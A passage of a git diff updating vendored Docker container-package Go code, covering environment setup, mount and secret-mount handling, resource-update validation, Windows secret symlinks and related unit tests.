"windows" && os == "linux") { + env = []string{ + "PATH=" + system.DefaultPathEnv(os), + "HOSTNAME=" + container.Config.Hostname, + } + if tty { + env = append(env, "TERM=xterm") + } + env = append(env, linkedEnv...) + } + + // because the env on the container can override certain default values + // we need to replace the 'env' keys where they match and append anything + // else. + env = ReplaceOrAppendEnvValues(env, container.Config.Env) + return env +} + +type rio struct { + cio.IO + + sc *stream.Config +} + +func (i *rio) Close() error { + i.IO.Close() + + return i.sc.CloseStreams() +} + +func (i *rio) Wait() { + i.sc.Wait() + + i.IO.Wait() } diff --git a/vendor/github.com/docker/docker/container/container_linux.go b/vendor/github.com/docker/docker/container/container_linux.go deleted file mode 100644 index 4d4c16b563..0000000000 --- a/vendor/github.com/docker/docker/container/container_linux.go +++ /dev/null @@ -1,9 +0,0 @@ -package container - -import ( - "golang.org/x/sys/unix" -) - -func detachMounted(path string) error { - return unix.Unmount(path, unix.MNT_DETACH) -} diff --git a/vendor/github.com/docker/docker/container/container_notlinux.go b/vendor/github.com/docker/docker/container/container_notlinux.go deleted file mode 100644 index f65653e992..0000000000 --- a/vendor/github.com/docker/docker/container/container_notlinux.go +++ /dev/null @@ -1,23 +0,0 @@ -// +build solaris freebsd - -package container - -import ( - "golang.org/x/sys/unix" -) - -func detachMounted(path string) error { - //Solaris and FreeBSD do not support the lazy unmount or MNT_DETACH feature. - // Therefore there are separate definitions for this. - return unix.Unmount(path, 0) -} - -// SecretMount returns the mount for the secret path -func (container *Container) SecretMount() *Mount { - return nil -} - -// UnmountSecrets unmounts the fs for secrets -func (container *Container) UnmountSecrets() error { - return nil -} diff --git a/vendor/github.com/docker/docker/container/container_unit_test.go b/vendor/github.com/docker/docker/container/container_unit_test.go index f301f25bbe..82b5864760 100644 --- a/vendor/github.com/docker/docker/container/container_unit_test.go +++ b/vendor/github.com/docker/docker/container/container_unit_test.go @@ -1,17 +1,22 @@ -package container +package container // import "github.com/docker/docker/container" import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" "testing" "github.com/docker/docker/api/types/container" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/logger/jsonfilelog" "github.com/docker/docker/pkg/signal" + "gotest.tools/assert" ) func TestContainerStopSignal(t *testing.T) { c := &Container{ - CommonContainer: CommonContainer{ - Config: &container.Config{}, - }, + Config: &container.Config{}, } def, err := signal.ParseSignal(signal.DefaultStopSignal) @@ -25,9 +30,7 @@ func TestContainerStopSignal(t *testing.T) { } c = &Container{ - CommonContainer: CommonContainer{ - Config: &container.Config{StopSignal: "SIGKILL"}, - }, + Config: &container.Config{StopSignal: "SIGKILL"}, } s = c.StopSignal() if s != 9 { @@ -37,9 +40,7 @@ func TestContainerStopSignal(t *testing.T) { func TestContainerStopTimeout(t *testing.T) { c := &Container{ - CommonContainer: CommonContainer{ - Config: &container.Config{}, - }, + Config: &container.Config{}, } s := c.StopTimeout() @@ -49,12 +50,77 @@ func TestContainerStopTimeout(t *testing.T) { stopTimeout := 15 c = &Container{ - CommonContainer: CommonContainer{ - Config: &container.Config{StopTimeout: &stopTimeout}, + Config: &container.Config{StopTimeout: &stopTimeout}, + } + s = c.StopTimeout() + if s != stopTimeout { + t.Fatalf("Expected %v, got %v", stopTimeout, s) + } +} + +func TestContainerSecretReferenceDestTarget(t *testing.T) { + ref := &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "app", }, } - s = c.StopSignal() - if s != 15 { - t.Fatalf("Expected 15, got %v", s) + + d := getSecretTargetPath(ref) + expected := filepath.Join(containerSecretMountPath, "app") + if d != expected { + t.Fatalf("expected secret dest %q; received %q", expected, d) } } + +func TestContainerLogPathSetForJSONFileLogger(t *testing.T) { + containerRoot, err := ioutil.TempDir("", "TestContainerLogPathSetForJSONFileLogger") + assert.NilError(t, err) + defer os.RemoveAll(containerRoot) + + c := &Container{ + Config: &container.Config{}, + HostConfig: &container.HostConfig{ + LogConfig: container.LogConfig{ + Type: jsonfilelog.Name, + }, + }, + ID: "TestContainerLogPathSetForJSONFileLogger", + Root: containerRoot, + } + + logger, err := c.StartLogger() + assert.NilError(t, err) + defer logger.Close() + + expectedLogPath, err := filepath.Abs(filepath.Join(containerRoot, fmt.Sprintf("%s-json.log", c.ID))) + assert.NilError(t, err) + assert.Equal(t, c.LogPath, expectedLogPath) +} + +func TestContainerLogPathSetForRingLogger(t *testing.T) { + containerRoot, err := ioutil.TempDir("", "TestContainerLogPathSetForRingLogger") + assert.NilError(t, err) + defer os.RemoveAll(containerRoot) + + c := &Container{ + Config: &container.Config{}, + HostConfig: &container.HostConfig{ + LogConfig: container.LogConfig{ + Type: jsonfilelog.Name, + Config: map[string]string{ + "mode": string(container.LogModeNonBlock), + }, + }, + }, + ID: "TestContainerLogPathSetForRingLogger", + Root: containerRoot, + } + + logger, err := c.StartLogger() + assert.NilError(t, err) + defer logger.Close() + + expectedLogPath, err := filepath.Abs(filepath.Join(containerRoot, fmt.Sprintf("%s-json.log", c.ID))) + assert.NilError(t, err) + assert.Equal(t, c.LogPath, expectedLogPath) +} diff --git a/vendor/github.com/docker/docker/container/container_unix.go b/vendor/github.com/docker/docker/container/container_unix.go index 4f6b795d2c..ed664f3eec 100644 --- a/vendor/github.com/docker/docker/container/container_unix.go +++ b/vendor/github.com/docker/docker/container/container_unix.go @@ -1,77 +1,34 @@ -// +build linux freebsd solaris +// +build !windows -package container +package container // import "github.com/docker/docker/container" import ( - "fmt" "io/ioutil" "os" "path/filepath" - "strings" - "github.com/Sirupsen/logrus" + "github.com/containerd/continuity/fs" + "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/pkg/chrootarchive" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/symlink" - "github.com/docker/docker/pkg/system" - "github.com/docker/docker/utils" "github.com/docker/docker/volume" - "github.com/opencontainers/runc/libcontainer/label" + volumemounts "github.com/docker/docker/volume/mounts" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" "golang.org/x/sys/unix" ) const ( - // DefaultSHMSize is the default size (64MB) of the SHM which will be mounted in the container - DefaultSHMSize int64 = 67108864 - containerSecretMountPath = "/run/secrets" -) - -// Container holds the fields specific to unixen implementations. -// See CommonContainer for standard fields common to all containers. -type Container struct { - CommonContainer - - // Fields below here are platform specific. - AppArmorProfile string - HostnamePath string - HostsPath string - ShmPath string - ResolvConfPath string - SeccompProfile string - NoNewPrivileges bool -} - -// ExitStatus provides exit reasons for a container. -type ExitStatus struct { - // The exit code with which the container exited. - ExitCode int - - // Whether the container encountered an OOM. - OOMKilled bool -} + // DefaultStopTimeout sets the default time, in seconds, to wait + // for the graceful container stop before forcefully terminating it. + DefaultStopTimeout = 10 -// CreateDaemonEnvironment returns the list of all environment variables given the list of -// environment variables related to links. -// Sets PATH, HOSTNAME and if container.Config.Tty is set: TERM. -// The defaults set here do not override the values in container.Config.Env -func (container *Container) CreateDaemonEnvironment(tty bool, linkedEnv []string) []string { - // Setup environment - env := []string{ - "PATH=" + system.DefaultPathEnv, - "HOSTNAME=" + container.Config.Hostname, - } - if tty { - env = append(env, "TERM=xterm") - } - env = append(env, linkedEnv...) - // because the env on the container can override certain default values - // we need to replace the 'env' keys where they match and append anything - // else. - env = utils.ReplaceOrAppendEnvValues(env, container.Config.Env) - return env -} + containerSecretMountPath = "/run/secrets" +) // TrySetNetworkMount attempts to set the network mounts given a provided destination and // the path to use for it; return true if the given destination was a network mount file @@ -106,22 +63,22 @@ func (container *Container) BuildHostnameFile() error { func (container *Container) NetworkMounts() []Mount { var mounts []Mount shared := container.HostConfig.NetworkMode.IsContainer() + parser := volumemounts.NewParser(container.OS) if container.ResolvConfPath != "" { if _, err := os.Stat(container.ResolvConfPath); err != nil { logrus.Warnf("ResolvConfPath set to %q, but can't stat this filename (err = %v); skipping", container.ResolvConfPath, err) } else { - if !container.HasMountFor("/etc/resolv.conf") { - label.Relabel(container.ResolvConfPath, container.MountLabel, shared) - } writable := !container.HostConfig.ReadonlyRootfs if m, exists := container.MountPoints["/etc/resolv.conf"]; exists { writable = m.RW + } else { + label.Relabel(container.ResolvConfPath, container.MountLabel, shared) } mounts = append(mounts, Mount{ Source: container.ResolvConfPath, Destination: "/etc/resolv.conf", Writable: writable, - Propagation: string(volume.DefaultPropagationMode), + Propagation: string(parser.DefaultPropagationMode()), }) } } @@ -129,18 +86,17 @@ func (container *Container) NetworkMounts() []Mount { if _, err := os.Stat(container.HostnamePath); err != nil { logrus.Warnf("HostnamePath set to %q, but can't stat this filename (err = %v); skipping", container.HostnamePath, err) } else { - if !container.HasMountFor("/etc/hostname") { - label.Relabel(container.HostnamePath, container.MountLabel, shared) - } writable := !container.HostConfig.ReadonlyRootfs if m, exists := container.MountPoints["/etc/hostname"]; exists { writable = m.RW + } else { + label.Relabel(container.HostnamePath, container.MountLabel, shared) } mounts = append(mounts, Mount{ Source: container.HostnamePath, Destination: "/etc/hostname", Writable: writable, - Propagation: string(volume.DefaultPropagationMode), + Propagation: string(parser.DefaultPropagationMode()), }) } } @@ -148,37 +104,31 @@ func (container *Container) NetworkMounts() []Mount { if _, err := os.Stat(container.HostsPath); err != nil { logrus.Warnf("HostsPath set to %q, but can't stat this filename (err = %v); skipping", container.HostsPath, err) } else { - if !container.HasMountFor("/etc/hosts") { - label.Relabel(container.HostsPath, container.MountLabel, shared) - } writable := !container.HostConfig.ReadonlyRootfs if m, exists := container.MountPoints["/etc/hosts"]; exists { writable = m.RW + } else { + label.Relabel(container.HostsPath, container.MountLabel, shared) } mounts = append(mounts, Mount{ Source: container.HostsPath, Destination: "/etc/hosts", Writable: writable, - Propagation: string(volume.DefaultPropagationMode), + Propagation: string(parser.DefaultPropagationMode()), }) } } return mounts } -// SecretMountPath returns the path of the secret mount for the container -func (container *Container) SecretMountPath() string { - return filepath.Join(container.Root, "secrets") -} - // CopyImagePathContent copies files in destination to the volume. func (container *Container) CopyImagePathContent(v volume.Volume, destination string) error { - rootfs, err := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, destination), container.BaseFS) + rootfs, err := container.GetResourcePath(destination) if err != nil { return err } - if _, err = ioutil.ReadDir(rootfs); err != nil { + if _, err := os.Stat(rootfs); err != nil { if os.IsNotExist(err) { return nil } @@ -204,97 +154,160 @@ func (container *Container) CopyImagePathContent(v volume.Volume, destination st // ShmResourcePath returns path to shm func (container *Container) ShmResourcePath() (string, error) { - return container.GetRootResourcePath("shm") + return container.MountsResourcePath("shm") } // HasMountFor checks if path is a mountpoint func (container *Container) HasMountFor(path string) bool { _, exists := container.MountPoints[path] - return exists -} - -// UnmountIpcMounts uses the provided unmount function to unmount shm and mqueue if they were mounted -func (container *Container) UnmountIpcMounts(unmount func(pth string) error) { - if container.HostConfig.IpcMode.IsContainer() || container.HostConfig.IpcMode.IsHost() { - return + if exists { + return true } - var warnings []string + // Also search among the tmpfs mounts + for dest := range container.HostConfig.Tmpfs { + if dest == path { + return true + } + } - if !container.HasMountFor("/dev/shm") { - shmPath, err := container.ShmResourcePath() - if err != nil { - logrus.Error(err) - warnings = append(warnings, err.Error()) - } else if shmPath != "" { - if err := unmount(shmPath); err != nil && !os.IsNotExist(err) { - warnings = append(warnings, fmt.Sprintf("failed to umount %s: %v", shmPath, err)) - } + return false +} - } +// UnmountIpcMount uses the provided unmount function to unmount shm if it was mounted +func (container *Container) UnmountIpcMount(unmount func(pth string) error) error { + if container.HasMountFor("/dev/shm") { + return nil } - if len(warnings) > 0 { - logrus.Warnf("failed to cleanup ipc mounts:\n%v", strings.Join(warnings, "\n")) + // container.ShmPath should not be used here as it may point + // to the host's or other container's /dev/shm + shmPath, err := container.ShmResourcePath() + if err != nil { + return err + } + if shmPath == "" { + return nil + } + if err = unmount(shmPath); err != nil && !os.IsNotExist(err) { + if mounted, mErr := mount.Mounted(shmPath); mounted || mErr != nil { + return errors.Wrapf(err, "umount %s", shmPath) + } } + return nil } // IpcMounts returns the list of IPC mounts func (container *Container) IpcMounts() []Mount { var mounts []Mount + parser := volumemounts.NewParser(container.OS) - if !container.HasMountFor("/dev/shm") { - label.SetFileLabel(container.ShmPath, container.MountLabel) - mounts = append(mounts, Mount{ - Source: container.ShmPath, - Destination: "/dev/shm", - Writable: true, - Propagation: string(volume.DefaultPropagationMode), - }) + if container.HasMountFor("/dev/shm") { + return mounts + } + if container.ShmPath == "" { + return mounts } + label.SetFileLabel(container.ShmPath, container.MountLabel) + mounts = append(mounts, Mount{ + Source: container.ShmPath, + Destination: "/dev/shm", + Writable: true, + Propagation: string(parser.DefaultPropagationMode()), + }) + return mounts } -// SecretMount returns the mount for the secret path -func (container *Container) SecretMount() *Mount { - if len(container.SecretReferences) > 0 { - return &Mount{ - Source: container.SecretMountPath(), - Destination: containerSecretMountPath, +// SecretMounts returns the mounts for the secret path. +func (container *Container) SecretMounts() ([]Mount, error) { + var mounts []Mount + for _, r := range container.SecretReferences { + if r.File == nil { + continue + } + src, err := container.SecretFilePath(*r) + if err != nil { + return nil, err + } + mounts = append(mounts, Mount{ + Source: src, + Destination: getSecretTargetPath(r), Writable: false, + }) + } + for _, r := range container.ConfigReferences { + fPath, err := container.ConfigFilePath(*r) + if err != nil { + return nil, err } + mounts = append(mounts, Mount{ + Source: fPath, + Destination: r.File.Name, + Writable: false, + }) } - return nil + return mounts, nil } // UnmountSecrets unmounts the local tmpfs for secrets func (container *Container) UnmountSecrets() error { - if _, err := os.Stat(container.SecretMountPath()); err != nil { + p, err := container.SecretMountPath() + if err != nil { + return err + } + if _, err := os.Stat(p); err != nil { if os.IsNotExist(err) { return nil } return err } - return detachMounted(container.SecretMountPath()) + return mount.RecursiveUnmount(p) } -// UpdateContainer updates configuration of a container. -func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { - container.Lock() - defer container.Unlock() +type conflictingUpdateOptions string + +func (e conflictingUpdateOptions) Error() string { + return string(e) +} + +func (e conflictingUpdateOptions) Conflict() {} +// UpdateContainer updates configuration of a container. Callers must hold a Lock on the Container. +func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { // update resources of container resources := hostConfig.Resources cResources := &container.HostConfig.Resources + + // validate NanoCPUs, CPUPeriod, and CPUQuota + // Because NanoCPU effectively updates CPUPeriod/CPUQuota, + // once NanoCPU is already set, updating CPUPeriod/CPUQuota will be blocked, and vice versa. + // In the following we make sure the intended update (resources) does not conflict with the existing (cResource). + if resources.NanoCPUs > 0 && cResources.CPUPeriod > 0 { + return conflictingUpdateOptions("Conflicting options: Nano CPUs cannot be updated as CPU Period has already been set") + } + if resources.NanoCPUs > 0 && cResources.CPUQuota > 0 { + return conflictingUpdateOptions("Conflicting options: Nano CPUs cannot be updated as CPU Quota has already been set") + } + if resources.CPUPeriod > 0 && cResources.NanoCPUs > 0 { + return conflictingUpdateOptions("Conflicting options: CPU Period cannot be updated as NanoCPUs has already been set") + } + if resources.CPUQuota > 0 && cResources.NanoCPUs > 0 { + return conflictingUpdateOptions("Conflicting options: CPU Quota cannot be updated as NanoCPUs has already been set") + } + if resources.BlkioWeight != 0 { cResources.BlkioWeight = resources.BlkioWeight } if resources.CPUShares != 0 { cResources.CPUShares = resources.CPUShares } + if resources.NanoCPUs != 0 { + cResources.NanoCPUs = resources.NanoCPUs + } if resources.CPUPeriod != 0 { cResources.CPUPeriod = resources.CPUPeriod } @@ -311,7 +324,7 @@ func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfi // if memory limit smaller than already set memoryswap limit and doesn't // update the memoryswap limit, then error out. if resources.Memory > cResources.MemorySwap && resources.MemorySwap == 0 { - return fmt.Errorf("Memory limit should be smaller than already set memoryswap limit, update the memoryswap at the same time") + return conflictingUpdateOptions("Memory limit should be smaller than already set memoryswap limit, update the memoryswap at the same time") } cResources.Memory = resources.Memory } @@ -324,20 +337,21 @@ func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfi if resources.KernelMemory != 0 { cResources.KernelMemory = resources.KernelMemory } + if resources.CPURealtimePeriod != 0 { + cResources.CPURealtimePeriod = resources.CPURealtimePeriod + } + if resources.CPURealtimeRuntime != 0 { + cResources.CPURealtimeRuntime = resources.CPURealtimeRuntime + } // update HostConfig of container if hostConfig.RestartPolicy.Name != "" { if container.HostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { - return fmt.Errorf("Restart policy cannot be updated because AutoRemove is enabled for the container") + return conflictingUpdateOptions("Restart policy cannot be updated because AutoRemove is enabled for the container") } container.HostConfig.RestartPolicy = hostConfig.RestartPolicy } - if err := container.ToDisk(); err != nil { - logrus.Errorf("Error saving updated container: %v", err) - return err - } - return nil } @@ -367,7 +381,7 @@ func (container *Container) DetachAndUnmount(volumeEventLog func(name, action st } for _, mountPath := range mountPaths { - if err := detachMounted(mountPath); err != nil { + if err := mount.Unmount(mountPath); err != nil { logrus.Warnf("%s unmountVolumes: Failed to do lazy umount fo volume '%s': %v", container.ID, mountPath, err) } } @@ -377,42 +391,20 @@ func (container *Container) DetachAndUnmount(volumeEventLog func(name, action st // copyExistingContents copies from the source to the destination and // ensures the ownership is appropriately set. func copyExistingContents(source, destination string) error { - volList, err := ioutil.ReadDir(source) - if err != nil { - return err - } - if len(volList) > 0 { - srcList, err := ioutil.ReadDir(destination) - if err != nil { - return err - } - if len(srcList) == 0 { - // If the source volume is empty, copies files from the root into the volume - if err := chrootarchive.CopyWithTar(source, destination); err != nil { - return err - } - } - } - return copyOwnership(source, destination) -} - -// copyOwnership copies the permissions and uid:gid of the source file -// to the destination file -func copyOwnership(source, destination string) error { - stat, err := system.Stat(source) + dstList, err := ioutil.ReadDir(destination) if err != nil { return err } - - if err := os.Chown(destination, int(stat.UID()), int(stat.GID())); err != nil { - return err + if len(dstList) != 0 { + // destination is not empty, do not copy + return nil } - - return os.Chmod(destination, os.FileMode(stat.Mode())) + return fs.CopyDir(destination, source) } // TmpfsMounts returns the list of tmpfs mounts func (container *Container) TmpfsMounts() ([]Mount, error) { + parser := volumemounts.NewParser(container.OS) var mounts []Mount for dest, data := range container.HostConfig.Tmpfs { mounts = append(mounts, Mount{ @@ -423,7 +415,7 @@ func (container *Container) TmpfsMounts() ([]Mount, error) { } for dest, mnt := range container.MountPoints { if mnt.Type == mounttypes.TypeTmpfs { - data, err := volume.ConvertTmpfsOptions(mnt.Spec.TmpfsOptions, mnt.Spec.ReadOnly) + data, err := parser.ConvertTmpfsOptions(mnt.Spec.TmpfsOptions, mnt.Spec.ReadOnly) if err != nil { return nil, err } @@ -437,12 +429,35 @@ func (container *Container) TmpfsMounts() ([]Mount, error) { return mounts, nil } -// cleanResourcePath cleans a resource path and prepares to combine with mnt path -func cleanResourcePath(path string) string { - return filepath.Join(string(os.PathSeparator), path) -} - // EnableServiceDiscoveryOnDefaultNetwork Enable service discovery on default network func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool { return false } + +// GetMountPoints gives a platform specific transformation to types.MountPoint. Callers must hold a Container lock. +func (container *Container) GetMountPoints() []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Type: m.Type, + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + Mode: m.Mode, + RW: m.RW, + Propagation: m.Propagation, + }) + } + return mountPoints +} + +// ConfigFilePath returns the path to the on-disk location of a config. +// On unix, configs are always considered secret +func (container *Container) ConfigFilePath(configRef swarmtypes.ConfigReference) (string, error) { + mounts, err := container.SecretMountPath() + if err != nil { + return "", err + } + return filepath.Join(mounts, configRef.ConfigID), nil +} diff --git a/vendor/github.com/docker/docker/container/container_windows.go b/vendor/github.com/docker/docker/container/container_windows.go index 1025836f1f..b5bdb5bc34 100644 --- a/vendor/github.com/docker/docker/container/container_windows.go +++ b/vendor/github.com/docker/docker/container/container_windows.go @@ -1,41 +1,29 @@ -// +build windows - -package container +package container // import "github.com/docker/docker/container" import ( "fmt" "os" "path/filepath" + "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/utils" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/system" ) -// Container holds fields specific to the Windows implementation. See -// CommonContainer for standard fields common to all containers. -type Container struct { - CommonContainer - - // Fields below here are platform specific. -} - -// ExitStatus provides exit reasons for a container. -type ExitStatus struct { - // The exit code with which the container exited. - ExitCode int -} +const ( + containerSecretMountPath = `C:\ProgramData\Docker\secrets` + containerInternalSecretMountPath = `C:\ProgramData\Docker\internal\secrets` + containerInternalConfigsDirPath = `C:\ProgramData\Docker\internal\configs` -// CreateDaemonEnvironment creates a new environment variable slice for this container. -func (container *Container) CreateDaemonEnvironment(_ bool, linkedEnv []string) []string { - // because the env on the container can override certain default values - // we need to replace the 'env' keys where they match and append anything - // else. - return utils.ReplaceOrAppendEnvValues(linkedEnv, container.Config.Env) -} + // DefaultStopTimeout is the timeout (in seconds) for the shutdown call on a container + DefaultStopTimeout = 30 +) -// UnmountIpcMounts unmounts Ipc related mounts. +// UnmountIpcMount unmounts Ipc related mounts. // This is a NOOP on windows. -func (container *Container) UnmountIpcMounts(unmount func(pth string) error) { +func (container *Container) UnmountIpcMount(unmount func(pth string) error) error { + return nil } // IpcMounts returns the list of Ipc related mounts. @@ -43,16 +31,94 @@ func (container *Container) IpcMounts() []Mount { return nil } -// SecretMount returns the mount for the secret path -func (container *Container) SecretMount() *Mount { +// CreateSecretSymlinks creates symlinks to files in the secret mount. +func (container *Container) CreateSecretSymlinks() error { + for _, r := range container.SecretReferences { + if r.File == nil { + continue + } + resolvedPath, _, err := container.ResolvePath(getSecretTargetPath(r)) + if err != nil { + return err + } + if err := system.MkdirAll(filepath.Dir(resolvedPath), 0, ""); err != nil { + return err + } + if err := os.Symlink(filepath.Join(containerInternalSecretMountPath, r.SecretID), resolvedPath); err != nil { + return err + } + } + return nil } +// SecretMounts returns the mount for the secret path. +// All secrets are stored in a single mount on Windows. Target symlinks are +// created for each secret, pointing to the files in this mount. +func (container *Container) SecretMounts() ([]Mount, error) { + var mounts []Mount + if len(container.SecretReferences) > 0 { + src, err := container.SecretMountPath() + if err != nil { + return nil, err + } + mounts = append(mounts, Mount{ + Source: src, + Destination: containerInternalSecretMountPath, + Writable: false, + }) + } + + return mounts, nil +} + // UnmountSecrets unmounts the fs for secrets func (container *Container) UnmountSecrets() error { + p, err := container.SecretMountPath() + if err != nil { + return err + } + return os.RemoveAll(p) +} + +// CreateConfigSymlinks creates symlinks to files in the config mount. +func (container *Container) CreateConfigSymlinks() error { + for _, configRef := range container.ConfigReferences { + if configRef.File == nil { + continue + } + resolvedPath, _, err := container.ResolvePath(configRef.File.Name) + if err != nil { + return err + } + if err := system.MkdirAll(filepath.Dir(resolvedPath), 0, ""); err != nil { + return err + } + if err := os.Symlink(filepath.Join(containerInternalConfigsDirPath, configRef.ConfigID), resolvedPath); err != nil { + return err + } + } + return nil } +// ConfigMounts returns the mount for configs. +// TODO: Right now Windows doesn't really have a "secure" storage for secrets, +// however some configs may contain secrets. Once secure storage is worked out, +// configs and secret handling should be merged. +func (container *Container) ConfigMounts() []Mount { + var mounts []Mount + if len(container.ConfigReferences) > 0 { + mounts = append(mounts, Mount{ + Source: container.ConfigsDirPath(), + Destination: containerInternalConfigsDirPath, + Writable: false, + }) + } + + return mounts +} + // DetachAndUnmount unmounts all volumes. // On Windows it only delegates to `UnmountVolumes` since there is nothing to // force unmount. @@ -66,17 +132,40 @@ func (container *Container) TmpfsMounts() ([]Mount, error) { return mounts, nil } -// UpdateContainer updates configuration of a container +// UpdateContainer updates configuration of a container. Callers must hold a Lock on the Container. func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { - container.Lock() - defer container.Unlock() resources := hostConfig.Resources - if resources.BlkioWeight != 0 || resources.CPUShares != 0 || - resources.CPUPeriod != 0 || resources.CPUQuota != 0 || - resources.CpusetCpus != "" || resources.CpusetMems != "" || - resources.Memory != 0 || resources.MemorySwap != 0 || - resources.MemoryReservation != 0 || resources.KernelMemory != 0 { - return fmt.Errorf("Resource updating isn't supported on Windows") + if resources.CPUShares != 0 || + resources.Memory != 0 || + resources.NanoCPUs != 0 || + resources.CgroupParent != "" || + resources.BlkioWeight != 0 || + len(resources.BlkioWeightDevice) != 0 || + len(resources.BlkioDeviceReadBps) != 0 || + len(resources.BlkioDeviceWriteBps) != 0 || + len(resources.BlkioDeviceReadIOps) != 0 || + len(resources.BlkioDeviceWriteIOps) != 0 || + resources.CPUPeriod != 0 || + resources.CPUQuota != 0 || + resources.CPURealtimePeriod != 0 || + resources.CPURealtimeRuntime != 0 || + resources.CpusetCpus != "" || + resources.CpusetMems != "" || + len(resources.Devices) != 0 || + len(resources.DeviceCgroupRules) != 0 || + resources.DiskQuota != 0 || + resources.KernelMemory != 0 || + resources.MemoryReservation != 0 || + resources.MemorySwap != 0 || + resources.MemorySwappiness != nil || + resources.OomKillDisable != nil || + resources.PidsLimit != 0 || + len(resources.Ulimits) != 0 || + resources.CPUCount != 0 || + resources.CPUPercent != 0 || + resources.IOMaximumIOps != 0 || + resources.IOMaximumBandwidth != 0 { + return fmt.Errorf("resource updating isn't supported on Windows") } // update HostConfig of container if hostConfig.RestartPolicy.Name != "" { @@ -88,18 +177,6 @@ func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfi return nil } -// cleanResourcePath cleans a resource path by removing C:\ syntax, and prepares -// to combine with a volume path -func cleanResourcePath(path string) string { - if len(path) >= 2 { - c := path[0] - if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') { - path = path[2:] - } - } - return filepath.Join(string(os.PathSeparator), path) -} - // BuildHostnameFile writes the container's hostname file. func (container *Container) BuildHostnameFile() error { return nil @@ -109,3 +186,28 @@ func (container *Container) BuildHostnameFile() error { func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool { return true } + +// GetMountPoints gives a platform specific transformation to types.MountPoint. Callers must hold a Container lock. +func (container *Container) GetMountPoints() []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Type: m.Type, + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + RW: m.RW, + }) + } + return mountPoints +} + +func (container *Container) ConfigsDirPath() string { + return filepath.Join(container.Root, "configs") +} + +// ConfigFilePath returns the path to the on-disk location of a config. +func (container *Container) ConfigFilePath(configRef swarmtypes.ConfigReference) string { + return filepath.Join(container.ConfigsDirPath(), configRef.ConfigID) +} diff --git a/vendor/github.com/docker/docker/container/env.go b/vendor/github.com/docker/docker/container/env.go new file mode 100644 index 0000000000..d225fd1471 --- /dev/null +++ b/vendor/github.com/docker/docker/container/env.go @@ -0,0 +1,43 @@ +package container // import "github.com/docker/docker/container" + +import ( + "strings" +) + +// ReplaceOrAppendEnvValues returns the defaults with the overrides either +// replaced by env key or appended to the list +func ReplaceOrAppendEnvValues(defaults, overrides []string) []string { + cache := make(map[string]int, len(defaults)) + for i, e := range defaults { + parts := strings.SplitN(e, "=", 2) + cache[parts[0]] = i + } + + for _, value := range overrides { + // Values w/o = means they want this env to be removed/unset. + if !strings.Contains(value, "=") { + if i, exists := cache[value]; exists { + defaults[i] = "" // Used to indicate it should be removed + } + continue + } + + // Just do a normal set/update + parts := strings.SplitN(value, "=", 2) + if i, exists := cache[parts[0]]; exists { + defaults[i] = value + } else { + defaults = append(defaults, value) + } + } + + // Now remove all entries that we want to "unset" + for i := 0; i < len(defaults); i++ { + if defaults[i] == "" { + defaults = append(defaults[:i], defaults[i+1:]...) + i-- + } + } + + return defaults +} diff --git a/vendor/github.com/docker/docker/utils/utils_test.go b/vendor/github.com/docker/docker/container/env_test.go similarity index 56% rename from vendor/github.com/docker/docker/utils/utils_test.go rename to vendor/github.com/docker/docker/container/env_test.go index ab3911e8b3..77856284c2 100644 --- a/vendor/github.com/docker/docker/utils/utils_test.go +++ b/vendor/github.com/docker/docker/container/env_test.go @@ -1,14 +1,17 @@ -package utils +package container // import "github.com/docker/docker/container" import "testing" func TestReplaceAndAppendEnvVars(t *testing.T) { var ( - d = []string{"HOME=/"} - o = []string{"HOME=/root", "TERM=xterm"} + d = []string{"HOME=/", "FOO=foo_default"} + // remove FOO from env + // remove BAR from env (nop) + o = []string{"HOME=/root", "TERM=xterm", "FOO", "BAR"} ) env := ReplaceOrAppendEnvValues(d, o) + t.Logf("default=%v, override=%v, result=%v", d, o, env) if len(env) != 2 { t.Fatalf("expected len of 2 got %d", len(env)) } diff --git a/vendor/github.com/docker/docker/container/health.go b/vendor/github.com/docker/docker/container/health.go index 6e3cd12f3b..167ee9b476 100644 --- a/vendor/github.com/docker/docker/container/health.go +++ b/vendor/github.com/docker/docker/container/health.go @@ -1,35 +1,63 @@ -package container +package container // import "github.com/docker/docker/container" import ( - "github.com/Sirupsen/logrus" + "sync" + "github.com/docker/docker/api/types" + "github.com/sirupsen/logrus" ) // Health holds the current container health-check state type Health struct { types.Health stop chan struct{} // Write struct{} to stop the monitor + mu sync.Mutex } // String returns a human-readable description of the health-check state func (s *Health) String() string { - // This happens when the container is being shutdown and the monitor has stopped - // or the monitor has yet to be setup. - if s.stop == nil { - return types.Unhealthy - } + status := s.Status() - switch s.Status { + switch status { case types.Starting: return "health: starting" default: // Healthy and Unhealthy are clear on their own - return s.Status + return s.Health.Status } } -// OpenMonitorChannel creates and returns a new monitor channel. If there already is one, -// it returns nil. +// Status returns the current health 